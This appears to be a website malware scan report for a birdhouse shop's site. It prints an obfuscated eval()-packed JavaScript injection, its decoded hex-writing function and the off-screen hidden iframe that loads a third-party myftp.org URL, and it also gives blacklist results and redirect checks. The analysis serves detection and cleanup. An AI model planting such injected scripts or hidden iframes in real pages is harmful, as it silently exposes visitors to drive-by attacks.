Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=uneekbirdhouses.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://uneekbirdhouses.com/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://uneekbirdhouses.com/ | 200 OK Content-Length: 1019 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Packed script as served (truncated in this report):
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o k(3){1 7=\'s\';1 5=e g();c(1 i=0;i<q;i++){5[7.b(i>>4)+7.b(i&l)]=m.n(i)}d(!3.r(/^[a-t-9]*$/i))h y;d(3.f%2)3=\'0\'+3;1 8=3.f;1 6=e g();1 j=0;c(1 i=0;i<8;i+=2){6[j++]=5[3.v(i,2)]}h 6.x(\'\')}w.p(k(\'u\
Decoded script (the hex argument is truncated in this report):
function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}document.write(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c65
Markup that document.write() inserts into the page once the hex string is decoded (the visible hex prefix decodes to the opening of this div). It is a 2x4 px iframe positioned off-screen, so the visitor's browser loads the third-party URL without anything being displayed:
<div style="position: absolute; left: -1997px; top: -2995px;"><iframe width="2" height="4" src="http://ahftytdzrm.myftp.org/i.php?go=1"></iframe></div>
Antivirus reports: (no antivirus entries are present in this copy of the report)
http://uneekbirdhouses.com/test404page.js | 200 OK Content-Length: 1019 Content-Type: text/html | malicious |
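Malicious code - confirmed by antiviruses (see below)
Note: this response has the same status, Content-Length (1019) and Content-Type (text/html) as the home page although the requested path ends in .js, and the code found is identical. This suggests the server answers this test URL with the same injected page rather than a 404, so it is probably the same injection and not a second infected file.
Packed script as served (truncated in this report):
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o k(3){1 7=\'s\';1 5=e g();c(1 i=0;i<q;i++){5[7.b(i>>4)+7.b(i&l)]=m.n(i)}d(!3.r(/^[a-t-9]*$/i))h y;d(3.f%2)3=\'0\'+3;1 8=3.f;1 6=e g();1 j=0;c(1 i=0;i<8;i+=2){6[j++]=5[3.v(i,2)]}h 6.x(\'\')}w.p(k(\'u\
Decoded script (the hex argument is truncated in this report):
function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}document.write(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c65
Markup that document.write() inserts into the page once the hex string is decoded (an off-screen 2x4 px iframe loading a third-party URL):
<div style="position: absolute; left: -1997px; top: -2995px;"><iframe width="2" height="4" src="http://ahftytdzrm.myftp.org/i.php?go=1"></iframe></div>
Antivirus reports: (no antivirus entries are present in this copy of the report)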
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: uneekbirdhouses.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:11:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: uneekbirdhouses.com
Referer: http://www.google.com/search?q=uneekbirdhouses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.